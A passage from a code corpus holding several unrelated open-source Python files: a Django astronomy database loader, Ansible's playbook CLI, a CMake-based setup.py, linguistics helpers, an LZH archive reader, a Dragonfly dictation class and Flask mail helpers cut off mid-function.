telescope = '1m0-02'
instrument = 'kb70'
group_id = "RBN20150922T15.42112818"
track_id = "0000110965"
req_id = "0000427795"
airmass = 1.33
fwhm = 6.45
sky_bg = 2143.5435347
sd_bg = 80.543
moon_sep = 18.43
elongation = 1.2345234
nstars = 120
quality = "Rejected: High FWHM of stars "
update_log(event_name, image_name, timestamp, exptime,
filter1, filter2, filter3, telescope, instrument, group_id,
track_id, req_id, airmass, fwhm, sky_bg, sd_bg, moon_sep,
elongation, nstars, quality)
count = count + 1
print count
# Populate Robonet_Reduction database
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
lc_file = 'lc_'+event_name+'_ip.t'
timestamp = timezone.now()
version = 1
ref_image = 'reference.fits'
update_reduction(event_name, lc_file, timestamp, version, ref_image, ron=0.0, gain=1.0,
oscanx1=1, oscanx2=50, oscany1=1, oscany2=500, imagex1=51, imagex2=1000,
imagey1=1, imagey2=1000, minval=1.0, maxval=55000.0, growsatx=0,
growsaty=0, coeff2=1.0e-06, coeff3=1.0e-12,
sigclip=4.5, sigfrac=0.5, flim=2.0, niter=4, use_reflist=0, max_nimages=1,
max_sky=5000.0, min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0,
min_scale=0.99, max_scale=1.01,
fov=0.1, star_space=30, init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0,
var_deg=1, det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7,
psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0, lres_ker_rad=2.0,
subframes_x=1, subframes_y=1, grow=0.0, ps_var=0, back_var=1, diffpro=0)
count = count + 1
print count
# Populate Single_Model database
from glob import glob
from astropy.time import Time
ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/model/OB15*.model')
count = 0
for i in ogle_event_list:
data = open(i).read().split()
event_name = data[2].replace('OB15','OGLE-2015-BLG-')
Tmax = 2450000.0+float(data[3])
e_Tmax = float(data[4])
tau = float(data[5])
e_tau = float(data[6])
umin = float(data[7])
e_umin = float(data[8])
if (data[12] != '0.0'):
last_updated = Time(float('245'+data[12]), format='jd').datetime
last_updated = timezone.make_aware(last_updated, timezone.get_current_timezone())
else:
last_updated = timezone.now()
single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated)
count = count + 1
print count
len(Event.objects.all())
def run_test2():
# Path to ARTEMiS files
artemis = "/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/"
# Color & site definitions for plotting
colors = artemis+"colours.sig.cfg"
colordef = artemis+"colourdef.sig.cfg"
# Set up and populate dictionaries
col_dict = {}
site_dict = {}
with open(colors) as f:
for line in f:
elem = line.split()
key = elem[0]
tel_id = " ".join([e.replace('"','') for e in elem[3:]])
vals = [elem[1], elem[2], tel_id]
site_dict[key] = vals
with open(colordef) as f:
for line in f:
elem = line.split()
key = elem[0]
val = elem[1]
col_dict[key] = val
# Populate Operator database
for s in ['OGLE', 'MOA', 'KMTNet', 'WISE', 'MOA', 'OGLE', 'KMTNet', 'PLANET', 'RoboNet', 'uFUN', 'uFUN', 'Other']:
add_operator(s)
# Populate Telescope database
from random import uniform
for i in site_dict.keys():
tel_name = site_dict[i][-1]
if ('LCOGT' in tel_name) or ('Liverpool' in tel_name):
# Get the appropriate pk for RoboNet
operator = Operator.objects.get(name='RoboNet')
site = tel_name.split(' ')[1]
elif 'OGLE' in tel_name:
operator = Operator.objects.get(name='OGLE')
site = 'CTIO'
elif 'MOA' in tel_name:
operator = Operator.objects.get(name='MOA')
site = 'New Zealand'
else:
operator = Operator.objects.get(name='Other')
site = ''
aperture = uniform(1.0,2.0)
add_telescope(operator=operator, telescope_name=tel_name, aperture=aperture, site=site)
# Populate Instrument database
for i in Telescope.objects.all().values():
inst = i['name']+' CCD camera'
telescope = Telescope.objects.get(name=i['name'])
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
# Add a few test instruments at existing telescopes
telescope = Telescope.objects.get(name='LCOGT SAAO 1m A')
inst = '!!!TEST SAA0 1m A NEW INST!!!'
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
telescope = Telescope.objects.get(name='Faulkes North 2.0m')
inst = '!!!TEST FTN 2.0m NEW INST!!!'
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
telescope = Telescope.objects.get(name='LCOGT CTIO 1m A')
inst = '!!!TEST CTIO 1m A NEW INST!!!'
pixscale = uniform(0.1,1.4)
add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
# Populate filter database
filters = ['Bessell-U', 'Bessell-B', 'Bessell-V','Bessell-R','Bessell-I', 'SDSS-u',
'SDSS-g', 'SDSS-r', 'SDSS-i', 'SDSS-z', 'H-alpha']
for i in Instrument.objects.all():
for j in filters:
add_filter(instrument=i, filter_name=j)
| gpl-2.0 | 7,512,084,029,422,223,000 | 45.410816 | 173 | 0.614224 | false | 3.405054 | false | false | false |
Russell-IO/ansible | lib/ansible/cli/playbook.py | 63 | 8553 | # (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
########################################################
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import stat
from ansible.cli import CLI
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.executor.playbook_executor import PlaybookExecutor
from ansible.playbook.block import Block
from ansible.playbook.play_context import PlayContext
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class PlaybookCLI(CLI):
''' the tool to run *Ansible playbooks*, which are a configuration and multinode deployment system.
See the project home page (https://docs.ansible.com) for more information. '''
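    # Typical invocation (illustrative only): ansible-playbook -i inventory site.yml --list-tasks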
def parse(self):
# create parser for CLI options
parser = CLI.base_parser(
usage="%prog [options] playbook.yml [playbook2 ...]",
connect_opts=True,
meta_opts=True,
runas_opts=True,
subset_opts=True,
check_opts=True,
inventory_opts=True,
runtask_opts=True,
vault_opts=True,
fork_opts=True,
module_opts=True,
desc="Runs Ansible playbooks, executing the defined tasks on the targeted hosts.",
)
# ansible playbook specific opts
parser.add_option('--list-tasks', dest='listtasks', action='store_true',
help="list all tasks that would be executed")
parser.add_option('--list-tags', dest='listtags', action='store_true',
help="list all available tags")
parser.add_option('--step', dest='step', action='store_true',
help="one-step-at-a-time: confirm each task before running")
parser.add_option('--start-at-task', dest='start_at_task',
help="start the playbook at the task matching this name")
self.parser = parser
super(PlaybookCLI, self).parse()
if len(self.args) == 0:
raise AnsibleOptionsError("You must specify a playbook file to run")
display.verbosity = self.options.verbosity
self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True)
def run(self):
super(PlaybookCLI, self).run()
# Manage passwords
sshpass = None
becomepass = None
passwords = {}
# initial error check, to make sure all specified playbooks are accessible
# before we start running anything through the playbook executor
for playbook in self.args:
if not os.path.exists(playbook):
raise AnsibleError("the playbook: %s could not be found" % playbook)
if not (os.path.isfile(playbook) or stat.S_ISFIFO(os.stat(playbook).st_mode)):
raise AnsibleError("the playbook: %s does not appear to be a file" % playbook)
# don't deal with privilege escalation or passwords when we don't need to
if not self.options.listhosts and not self.options.listtasks and not self.options.listtags and not self.options.syntax:
self.normalize_become_options()
(sshpass, becomepass) = self.ask_passwords()
passwords = {'conn_pass': sshpass, 'become_pass': becomepass}
loader, inventory, variable_manager = self._play_prereqs(self.options)
        # Note: slightly wrong, this is written so that implicit localhost
        # (which is not returned in list_hosts()) is taken into account for
# warning if inventory is empty. But it can't be taken into account for
# checking if limit doesn't match any hosts. Instead we don't worry about
# limit if only implicit localhost was in inventory to start with.
#
# Fix this when we rewrite inventory by making localhost a real host (and thus show up in list_hosts())
hosts = CLI.get_host_list(inventory, self.options.subset)
# flush fact cache if requested
if self.options.flush_cache:
self._flush_cache(inventory, variable_manager)
# create the playbook executor, which manages running the plays via a task queue manager
pbex = PlaybookExecutor(playbooks=self.args, inventory=inventory, variable_manager=variable_manager, loader=loader, options=self.options,
passwords=passwords)
results = pbex.run()
if isinstance(results, list):
for p in results:
display.display('\nplaybook: %s' % p['playbook'])
for idx, play in enumerate(p['plays']):
if play._included_path is not None:
loader.set_basedir(play._included_path)
else:
pb_dir = os.path.realpath(os.path.dirname(p['playbook']))
loader.set_basedir(pb_dir)
msg = "\n play #%d (%s): %s" % (idx + 1, ','.join(play.hosts), play.name)
mytags = set(play.tags)
msg += '\tTAGS: [%s]' % (','.join(mytags))
if self.options.listhosts:
playhosts = set(inventory.get_hosts(play.hosts))
msg += "\n pattern: %s\n hosts (%d):" % (play.hosts, len(playhosts))
for host in playhosts:
msg += "\n %s" % host
display.display(msg)
all_tags = set()
if self.options.listtags or self.options.listtasks:
taskmsg = ''
if self.options.listtasks:
taskmsg = ' tasks:\n'
def _process_block(b):
taskmsg = ''
for task in b.block:
if isinstance(task, Block):
taskmsg += _process_block(task)
else:
if task.action == 'meta':
continue
all_tags.update(task.tags)
if self.options.listtasks:
cur_tags = list(mytags.union(set(task.tags)))
cur_tags.sort()
if task.name:
taskmsg += " %s" % task.get_name()
else:
taskmsg += " %s" % task.action
taskmsg += "\tTAGS: [%s]\n" % ', '.join(cur_tags)
return taskmsg
all_vars = variable_manager.get_vars(play=play)
play_context = PlayContext(play=play, options=self.options)
for block in play.compile():
block = block.filter_tagged_tasks(play_context, all_vars)
if not block.has_tasks():
continue
taskmsg += _process_block(block)
if self.options.listtags:
cur_tags = list(mytags.union(all_tags))
cur_tags.sort()
taskmsg += " TASK TAGS: [%s]\n" % ', '.join(cur_tags)
display.display(taskmsg)
return 0
else:
return results
def _flush_cache(self, inventory, variable_manager):
for host in inventory.list_hosts():
hostname = host.get_name()
variable_manager.clear_facts(hostname)
| gpl-3.0 | -1,190,748,893,708,862,500 | 42.637755 | 145 | 0.542734 | false | 4.663577 | false | false | false |
ngsxfem/ngsxfem | setup.py | 1 | 3528 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import platform
import subprocess
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
from distutils.version import LooseVersion
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=''):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def run(self):
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError("CMake must be installed to build the following extensions: " +
", ".join(e.name for e in self.extensions))
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < '3.1.0':
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
# required for auto-detection of auxiliary "native" libs
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable,
'-DCMAKE_CXX_COMPILER=ngscxx',
'-DCMAKE_LINKER=ngsld',
'-DBUILD_STUB_FILES=ON',
'-DBUILD_NGSOLVE=OFF']
cfg = 'Debug' if self.debug else 'Release'
build_args = ['--config', cfg]
if platform.system() == "Windows":
#not expected to work... (but who knows..)
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
if sys.maxsize > 2**32:
cmake_args += ['-A', 'x64']
build_args += ['--', '/m']
else:
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]
build_args += ['--', '-j2']
env = os.environ.copy()
env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(env.get('CXXFLAGS', ''),
self.distribution.get_version())
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
subprocess.check_call(['mv', 'ngsxfem_py.so', 'xfem'], cwd=self.build_lib)
setup(
name='xfem',
version='2.0',
author='Christoph Lehrenfeld',
author_email='[email protected]',
description='(ngs)xfem is an Add-on library to Netgen/NGSolve for unfitted/cut FEM.',
long_description='(ngs)xfem is an Add-on library to Netgen/NGSolve which enables the use of unfitted finite element technologies known as XFEM, CutFEM, TraceFEM, Finite Cell, ... . ngsxfem is an academic software. Its primary intention is to facilitate the development and validation of new numerical methods.',
url="https://github.com/ngsxfem/ngsxfem",
ext_modules=[CMakeExtension('ngsxfem_py')],
cmdclass=dict(build_ext=CMakeBuild),
packages=["xfem"],
package_dir={"xfem": "python"},
python_requires='>=3.5',
)
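# Illustrative build commands (assumptions: CMake plus NGSolve's ngscxx/ngsld are on PATH;
# these lines are not part of the original file):
#     pip3 install .          # or: python3 setup.py bdist_wheel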
| lgpl-3.0 | -3,344,411,647,456,524,300 | 46.04 | 315 | 0.589569 | false | 3.698113 | false | false | false |
evolaemp/svmcc | code/prepare/utils.py | 1 | 2495 | import re
from lingpy.sequence.sound_classes import ipa2tokens, tokens2class
def make_sample_id(gloss_id, lang1, lang2, index1, index2):
"""
Sample IDs should uniquely identify a feature row.
Sample sample ID: 98/English,German/1,1
"""
assert lang1 < lang2
s = str(gloss_id) + '/'
s += lang1 +','+ lang2 + '/'
s += str(index1) +','+ str(index2)
return s
def explode_sample_id(sample_id, langs):
"""
Returns (gloss, lang1, lang2, index1, index2).
Expects the set of all possible langs as second argument.
Note: some datasets contain language names with chars such as: `/`, `,`.
"""
gloss = sample_id.split('/')[0]
lang_part = sample_id.split('/', maxsplit=1)[1]
lang_part = lang_part.rsplit('/', maxsplit=1)[0]
for lang1 in langs:
if lang_part.startswith(lang1+','):
lang2 = lang_part[len(lang1)+1:]
if lang2 in langs:
break
assert lang1 in langs
assert lang2 in langs
key1, key2 = sample_id.rsplit('/', maxsplit=1)[1].split(',')
key1, key2 = int(key1) - 1, int(key2) - 1
return gloss, lang1, lang2, key1, key2
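# Illustrative round trip (not part of the original module):
#     make_sample_id(98, 'English', 'German', 1, 1)
#         -> '98/English,German/1,1'
#     explode_sample_id('98/English,German/1,1', {'English', 'German'})
#         -> ('98', 'English', 'German', 0, 0)   # indices converted back to 0-based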
def clean_asjp(word):
"""
Removes ASJP diacritics.
"""
word = re.sub(r",","-",word)
word = re.sub(r"\%","",word)
word = re.sub(r"\*","",word)
word = re.sub(r"\"","",word)
word = re.sub(r".~","",word)
word = re.sub(r"(.)(.)(.)\$",r"\2",word)
word = re.sub(r" ","-",word)
return word
def ipa_to_asjp(w, params):
"""
Lingpy IPA-to-ASJP converter plus some cleanup.
Expects the params {} to contain the key: sounds.
This function is called on IPA datasets.
"""
w = w.replace('\"','').replace('-','').replace(' ','')
wA = ''.join(tokens2class(ipa2tokens(w, merge_vowels=False), 'asjp'))
wAA = clean_asjp(wA.replace('0','').replace('I','3').replace('H','N'))
asjp = ''.join([x for x in wAA if x in params['sounds']])
assert len(asjp) > 0
return asjp
def asjp_to_asjp(w, params):
"""
Cleans up the ASJP string and filters it to include the chars specified in
the sounds parameter.
This function is called on ASJP datasets.
"""
w = w.replace('\"','').replace('-','').replace(' ','')
wAA = clean_asjp(w.replace('0','').replace('I','3').replace('H','N'))
asjp = ''.join([x for x in wAA if x in params['sounds']])
assert len(asjp) > 0
return asjp
def is_asjp_data(data):
"""
Expects {lang: {gloss: [transcription,]}}.
Checks whether the translation strings are ASCII.
"""
return all([len(s.encode()) == len(s)
for lang in data.values()
for trans in lang.values()
for s in trans
])
| mit | -1,881,165,960,155,471,600 | 23.223301 | 75 | 0.625251 | false | 2.677039 | false | false | false |
FrodeSolheim/python-lhafile | lhafile/lhafile.py | 1 | 14048 | # -*- coding:utf-8 -*-
# Copyright (c) 2010 Hidekazu Ohnishi.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the author nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Lhafile, extension extract lzh file.
Its interface is like that of the zipfile module included in the regular Python environment.
"""
from __future__ import unicode_literals
try:
from cStringIO import BytesOrStringIO
except ImportError:
from io import BytesIO as BytesOrStringIO
import datetime
import os
import os.path
import struct
import sys
import lzhlib
crc16 = lzhlib.crc16
if sys.version_info[0] == 3:
string_types = (str,)
def ord(v):
return v
else:
string_types = (basestring,)
def unpack(format, data):
return struct.unpack(str(format), data)
def is_lhafile(filename):
try:
LhaFile(filename)
except:
return False
return True
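# Illustrative usage (a sketch; "archive.lzh" is a made-up file name), mirroring
# the zipfile-style interface described in the module docstring:
#
#     archive = LhaFile("archive.lzh")
#     for name in archive.namelist():
#         data = archive.read(name)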
class BadLhafile(Exception):
pass
class LhaInfo(object):
__slots__ = (
'orig_filename',
'filename',
'directory',
'date_time',
'compress_type',
'comment',
'extra',
'create_system',
'create_version',
'extract_version',
'reserved',
'flag_bits',
'volume',
'internal_attr',
'external_attr',
'header_offset',
'file_offset',
'CRC',
'compress_size',
'file_size',
)
def __init__(self):
self.orig_filename = None
self.filename = None
self.directory = None
self.date_time = None
self.compress_type = None
self.comment = None
self.extra = None
self.create_system = None
self.create_version = None
self.extract_version = None
self.reserved = None
self.flag_bits = None
self.volume = None
self.internal_attr = None
self.external_attr = None
self.header_offset = None
self.file_offset = None
self.CRC = None
self.compress_size = None
self.file_size = None
def __str__(self):
return '%s %s %08X %d %04X' % (self.filename, self.file_size,
self.file_offset, self.compress_size, self.CRC)
def __getstate__(self):
return (self.orig_filename, self.filename, self.directory, self.date_time,
self.compress_type, self.comment, self.extra, self.create_system,
self.create_version, self.extract_version, self.reserved,
self.flag_bits, self.volume, self.internal_attr, self.external_attr,
self.header_offset, self.file_offset, self.CRC, self.compress_size,
self.file_size)
def __setstate__(self, state):
(self.orig_filename, self.filename, self.directory, self.date_time,
self.compress_type, self.comment, self.extra, self.create_system,
self.create_version, self.extract_version, self.reserved,
self.flag_bits, self.volume, self.internal_attr, self.external_attr,
self.header_offset, self.file_offset, self.CRC, self.compress_size,
self.file_size) = state
class LhaFile(object):
"""
"""
SUPPORTED_COMPRESS_TYPE = (b'-lhd-', b'-lh0-', b'-lh5-', b'-lh6-', b'-lh7-')
def __init__(self, file, mode="r", compression=None, callback=None, args=None):
""" Open the LZH file """
self.filelist = []
self.NameToInfo = {}
self.mode = key = mode.replace('b', '')[0]
if isinstance(file, string_types):
self._fileParsed = 0
self.filename = file
modeDict = {'r' : 'rb'}
self.fp = open(file, modeDict[mode])
else:
self._fileParsed = 1
self.fp = file
self.filename = getattr(file, 'name', None)
# Get file size
initial_pos = self.fp.tell()
self.fp.seek(0, 2)
self.filesize = self.fp.tell()
self.fp.seek(initial_pos, 0)
if key == 'r':
self._GetContents(callback=callback,args=args)
else:
if not self._fileParsed:
self.fp.close()
self.fp = None
raise RuntimeError("Mode must be 'r'")
def _GetContents(self, callback=None, args=None):
try:
info = self._RealGetContent()
while info:
if not info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE:
raise RuntimeError("Unsupported file is contained %s" % (info.compress_type,))
if callback:
callback(args, self.fp.tell(), self.filesize, info)
self.filelist.append(info)
self.NameToInfo[info.filename] = info
info = self._RealGetContent()
except BadLhafile as e:
raise
if not self._fileParsed:
self.fp.close()
self.fp = None
def _RealGetContent(self):
fp = self.fp
filesize = self.filesize
initial_pos = fp.tell()
is_read = lambda x: fp.tell() + x < filesize
if fp.tell() == filesize - 1:
return None
if not is_read(26):
raise BadLhafile("Header is broken")
# Check OS level
os_level = ord(fp.read(21)[20])
fp.seek(-21, 1)
if not os_level in (0, 1, 2):
raise BadLhafile("this file level is out of support range %d" % os_level)
if os_level in (0, 1):
header_size, checksum, signature, skip_size, \
file_size, modify_time, reserved , os_level, \
filename_length = unpack('<BB5sII4sBBB', fp.read(22))
if is_read(filename_length + 2):
filename, crc = unpack('<%dsH' % filename_length, fp.read(filename_length + 2))
if os_level == 0:
ext_header_size = 0
pass
elif os_level == 1:
extra_data_size = header_size - (5+4+4+2+2+1+1+1+filename_length+2+1+2)
os_identifier, extra_data, ext_header_size \
= unpack('<c%dsH' % extra_data_size, fp.read(1 + extra_data_size + 2))
sum_ext_header_size = 0
directory = None
comment = None
compress_size = skip_size - sum_ext_header_size
elif os_level == 2:
header = fp.read(26)
all_header_size, signature, compress_size, file_size, \
modify_time, reserved, os_level, crc, os_identifier, \
ext_header_size = unpack('<H5sIIIBBHBH', header)
sum_ext_header_size = 0
directory = None
comment = None
while ext_header_size != 0:
sum_ext_header_size += ext_header_size
if not is_read(ext_header_size):
raise BadLhafile("File is broken")
(ext,) = unpack('<B', fp.read(1))
if ext == 0x00:
# Common header
dummy, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x01:
# Filename header
filename, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x02:
# Directory name header
directory, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x3F:
# Comment header
comment, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x40:
# Attribute Header
if not ext_header_size == 5:
raise BadLhafile("file is broken")
attr, ext_header_size \
= unpack('<HH', fp.read(4))
else:
# Skip the other
dummy, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
# skip to next header
file_offset = fp.tell()
if os_level in (0, 1):
compress_size = skip_size - sum_ext_header_size
if not is_read(compress_size):
raise BadLhafile("Compress data is too short")
fp.seek(compress_size, 1)
# modify_time
if os_level in (0, 1):
year = (ord(modify_time[3]) >> 1) + 1980
month = ((ord(modify_time[3]) << 8 | ord(modify_time[2])) >> 5) & 0x0F
day = ord(modify_time[2]) & 0x1F
hour = ord(modify_time[1]) >> 3
minute = ((ord(modify_time[1]) << 8 | ord(modify_time[0])) >> 5) & 0x3F
second = (ord(modify_time[0]) & 0x1F) * 2
#print(os_level, year, month, day, hour, minute, second)
try:
date_time = datetime.datetime(year, month, day, hour, minute, second)
except Exception:
date_time = datetime.datetime(1970, 1, 1)
create_time = date_time
elif os_level in (2,):
dummy_date = datetime.datetime(1970,1,1)
date_time = dummy_date.fromtimestamp(modify_time)
create_time = date_time
info = LhaInfo()
# FIXME: hardcoding ISO-8859-1 is not very nice
filename = filename.decode("ISO-8859-1")
if directory is None:
# for lhaplus archive
#sjisname = unicode(filename, 'cp932')
#if '\\' in sjisname:
# sjispath = [s.encode('cp932') for s in sjisname.split(u'\\')]
# filename = os.sep.join(sjispath)
# directory = os.sep.join(sjispath[:-1])
pass
else:
#print(repr(directory))
# FIXME: hardcoding ISO-8859-1 is not very nice
directory = directory.decode("ISO-8859-1")
directory = os.sep.join(directory.split('\xff'))
filename = os.path.join(directory, filename)
info.directory = directory
info.filename = filename
info.compress_size = compress_size
info.file_size = file_size
info.CRC = crc
info.header_offset = initial_pos
info.file_offset = file_offset
info.external_attr = None
info.internal_attr = None
info.reserved = 0
info.comment = comment
info.compress_type = signature
info.date_time = date_time
if "\x00" in info.filename:
info.filename, info.comment = info.filename.split("\x00")
return info
def lhaname(self):
return self.filename
def namelist(self):
if self.filelist:
return [d.filename for d in self.filelist \
if d.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE]
return None
def infolist(self):
return self.filelist
def read(self, name):
"""Return file bytes (as a string) for 'name'. """
if not self.fp:
raise RuntimeError("Attempt to read LZH archive that was already closed")
info = self.NameToInfo[name]
if info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE:
self.fp.seek(info.file_offset)
fin = BytesOrStringIO(self.fp.read(info.compress_size))
fout = BytesOrStringIO()
try:
session = lzhlib.LZHDecodeSession(fin, fout, info)
while not session.do_next():
pass
outsize = session.output_pos
crc = session.crc16
except Exception as e:
raise e
if outsize != info.file_size:
raise BadLhafile("%s output_size is not matched %d/%d %s" % \
(name, outsize, info.file_size, info.compress_type))
if crc != info.CRC:
raise BadLhafile("crc is not matched")
fout.seek(0)
bytes = fout.read()
        elif info.compress_type == b'-lhd-':
            raise RuntimeError("name is a directory")
        else:
            raise RuntimeError("Unsupported format")
return bytes
Lhafile = LhaFile
| bsd-3-clause | 9,002,658,663,594,287,000 | 35.865229 | 98 | 0.545202 | false | 3.992043 | false | false | false |
chajadan/dragonfly | dragonfly/engines/base/dictation.py | 5 | 3080 | #
# This file is part of Dragonfly.
# (c) Copyright 2007, 2008 by Christo Butcher
# Licensed under the LGPL.
#
# Dragonfly is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dragonfly is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Dragonfly. If not, see
# <http://www.gnu.org/licenses/>.
#
"""
Dictation container base class
============================================================================
This class is used to store the recognized results of dictation elements
within voice-commands. It offers access to both the raw spoken-form words
and the formatted written-form text.
The formatted text can be retrieved using
:meth:`~DictationContainerBase.format` or simply by calling ``str(...)``
on a dictation container object. A tuple of the raw spoken words can be
retrieved using :attr:`~DictationContainerBase.words`.
"""
#---------------------------------------------------------------------------
# Dictation base class -- base class for SR engine-specific containers
# of dictated words.
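# Illustrative usage (a sketch added for clarity; instantiating the base class
# directly is an assumption and not how the library is normally used):
#
#     container = DictationContainerBase([u"hello", u"world"])
#     container.words     # -> (u"hello", u"world")
#     container.format()  # -> u"hello world"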
class DictationContainerBase(object):
"""
Container class for dictated words as recognized by the
:class:`Dictation` element.
This base class implements the general functionality of dictation
container classes. Each supported engine should have a derived
dictation container class which performs the actual engine-
specific formatting of dictated text.
"""
def __init__(self, words):
"""
A dictation container is created by passing it a sequence
of words as recognized by the backend SR engine.
Each word must be a Unicode string.
:param words: A sequence of Unicode strings.
:type words: sequence-of-unicode
"""
self._words = tuple(words)
self._formatted = None
def __str__(self):
return unicode(self).encode("windows-1252")
def __unicode__(self):
if self._formatted is None:
self._formatted = self.format()
return self._formatted
def __repr__(self):
message = u"%s(%s)" % (self.__class__.__name__,
u", ".join(self._words))
return message.encode("windows-1252")
@property
def words(self):
""" Sequence of the words forming this dictation. """
return self._words
def format(self):
""" Format and return this dictation as a Unicode object. """
return u" ".join(self._words)
| lgpl-3.0 | -4,009,291,875,308,011,000 | 33.790698 | 76 | 0.612411 | false | 4.422414 | false | false | false |
ariestiyansyah/atlas | users/utilities/helpers.py | 2 | 1942 | # coding=utf-8
"""Helper methods."""
from threading import Thread
from flask import jsonify
from werkzeug.exceptions import HTTPException
from flask_mail import Message
from users import mail, APP
def make_json_error(ex):
"""Return errors as json.
See http://flask.pocoo.org/snippets/83/
:param ex: An exception.
:return: HttpResponse
"""
response = jsonify(message=str(ex))
response.status_code = (
ex.code
if isinstance(ex, HTTPException)
else 500)
return response
def send_mail(sender, recipients, subject, text_body, html_body):
"""To send a single email from sender to receiver synchronously
:param sender: Sender of the email.
:type sender: str
:param recipients: Recipients email address.
:type recipients: list
:param subject: Subject of the email.
:type subject: str
:param text_body: Text of the body.
:type text_body: str
:param html_body: HTML of the body.
:type html_body: str
"""
# Get mail server configuration
message = Message(subject=subject, sender=sender, recipients=recipients)
message.body = text_body
message.html = html_body
with APP.app_context():
mail.send(message)
def send_async_mail(sender, recipients, subject, text_body, html_body):
"""To send email asynchronously
:param sender: Sender of the email.
:type sender: str
:param recipients: Recipients email address.
:type recipients: list
:param subject: Subject of the email.
:type subject: str
:param text_body: Text of the body.
:type text_body: str
:param html_body: HTML of the body.
:type html_body: str
:return sender_thread: The thread for sending the email.
:rtype: Thread
"""
